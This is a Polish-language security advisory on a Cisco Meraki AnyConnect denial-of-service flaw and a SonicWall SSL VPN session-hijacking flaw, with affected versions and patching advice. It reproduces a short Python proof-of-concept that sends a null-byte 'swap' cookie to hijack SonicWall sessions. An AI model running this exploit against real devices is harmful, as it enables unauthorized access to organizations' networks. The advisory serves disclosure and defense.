Ujawnione ostatnio podatności w urządzeniach sieciowych Cisco oraz SonicWall zwracają uwagę na istotne zagrożenia związane z infrastrukturą VPN i firewalli. Obie luki mogą zostać wykorzystane przez cyberprzestępców do destabilizacji systemów, przejęcia aktywnych sesji VPN, a także uzyskania dostępu do wewnętrznych zasobów organizacji.
Poniżej przedstawiamy szczegółowe informacje na temat każdej z nich.
Podatność w Cisco AnyConnect VPN (CVE-2025-20212)
Problem dotyczy urządzeń Cisco Meraki MX i serii Z obsługujących funkcję SSL VPN (AnyConnect). Luka (ocena CVSS 3.1 i 7.7 – wysoki poziom zagrożenia) umożliwia uwierzytelnionemu atakującemu manipulowanie atrybutami sesji SSL VPN w taki sposób, by doprowadzić do awarii procesu obsługującego połączenia VPN. Skutkiem jest wystąpienie stanu odmowy usługi (Denial of Service, DoS), co powoduje natychmiastowe przerwanie aktywnych sesji VPN oraz potencjalnie destabilizuje infrastrukturę sieciową organizacji.
Technicznie rzecz biorąc, atak wykorzystuje błąd w sposobie, w jaki system przetwarza zmodyfikowane żądania sesji SSL VPN. Może to prowadzić do nieoczekiwanych błędów w alokacji pamięci lub nieprawidłowego zarządzania zasobami, co ostatecznie skutkuje zamknięciem usługi VPN. Choć atak wymaga wcześniejszego uwierzytelnienia, jest on szczególnie niebezpieczny w środowiskach korporacyjnych, gdzie Cisco Meraki pełni kluczową rolę w zapewnianiu dostępu do zasobów sieciowych.
Dotknięte produkty
Urządzenia Cisco Meraki serii MX/Z z włączoną funkcją AnyConnect VPN:
- MX64/MX65 (tylko firmware ≥17.6),
- MX67/MX68/MX75/MX84/MX95/MX100/MX250,
- vMX.
Podatność w SonicWall Firewall (CVE-2024-53704)
Druga luka (z lutego) dotyczy firewalli SonicWall i jest znacznie bardziej niebezpieczna, ponieważ pozwala atakującym przejąć aktywne sesje SSL VPN bez potrzeby uwierzytelnienia. Jest exploitowana w środowisku sieciowym i ostrzega o niej organizacja CISA. Podatność może być wykorzystana przez atakującego do przejęcia uprawnień sesji zalogowanego użytkownika i uzyskania dostępu do zasobów sieciowych, tak jakby był on legalnym użytkownikiem.
Problem wynika z błędnego zarządzania sesjami uwierzytelniającymi w systemie SonicWall. Atakujący może przechwycić lub odtworzyć tokeny sesji, co skutkuje przejęciem połączenia. Możliwe jest także wykorzystanie metod ataku typu session hijacking (przejęcie sesji) lub token replay attacks, gdzie ponowne wysłanie odpowiednio spreparowanego tokena pozwala przejąć autoryzację użytkownika.
Podatność dotyczy urządzeń SonicWall:
- NSv,
- zapór sieciowych Gen6 (wersji starszych niż 6.5.5.1-6n) oraz Gen7,
- a także systemów SonicOS w wersjach 7.1.x (do 7.1.1-7058), 7.1.2-7019 i 8.0.0-8035.
Warunkiem przeprowadzenia ataku jest istnienie przynajmniej jednej aktywnej sesji SSL VPN. Ze względu na wysoki poziom zagrożenia (CVSS 3.1: 9.8 – krytyczny), administratorzy powinni niezwłocznie wdrożyć stosowne aktualizacje zabezpieczeń.
Eksploitacja luki – jest POC
Badacze z BishopFox wykazali, iż zakodowanie 32 bajtów zerowych w formacie Base64 i ich wstrzyknięcie dzięki pliku cookie swap pozwala na przejęcie pełnej kontroli nad aktywnymi sesjami. Opublikowany skrypt proof-of-concept w języku Python pokazuje, jak łatwe jest wykorzystanie tej podatności.
pythonimport base64, requests, urllib3, warnings warnings.filterwarnings("ignore", category=urllib3.exceptions.InsecureRequestWarning) payload = base64.b64encode(b"\x00" * 32).decode() resp = requests.get( "https://192.168.50.189:4433/cgi-bin/sslvpnclient?launchplatform=", cookies={"swap": payload}, verify=False ) print(resp.headers) print(resp.text)Zalecenia dotyczące zabezpieczeń
Cisco i SonicWall natychmiast po wykryciu luk opublikowały stosowne poprawki i zalecają ich pilne wdrożenie.
Administratorzy powinni:
- Zaktualizować firmware na urządzeniach Cisco Meraki oraz SonicWall do najnowszych wersji, które zawierają poprawki bezpieczeństwa.
- Monitorować logi sieciowe pod kątem nieautoryzowanych prób połączeń oraz nietypowej aktywności związanej z sesjami VPN.
- Wprowadzić dodatkowe mechanizmy zabezpieczeń, takie jak uwierzytelnianie wieloskładnikowe (MFA) oraz ograniczenia dostępu do VPN na podstawie polityk sieciowych.
- Regularnie testować podatności w swojej infrastrukturze VPN i firewalli, aby minimalizować ryzyko wykorzystania nieznanych jeszcze luk bezpieczeństwa.
Obie podatności podkreślają znaczenie regularnych aktualizacji oraz aktywnego monitorowania bezpieczeństwa urządzeń sieciowych. W przypadku zaniechania działań naprawczych organizacje narażają się na ataki prowadzące do utraty dostępu do zasobów sieciowych oraz potencjalnych naruszeń danych.
Dodatkowe informacje o obu podatnościach znajdziecie tutaj (Cisco) i tutaj (SonicWall).
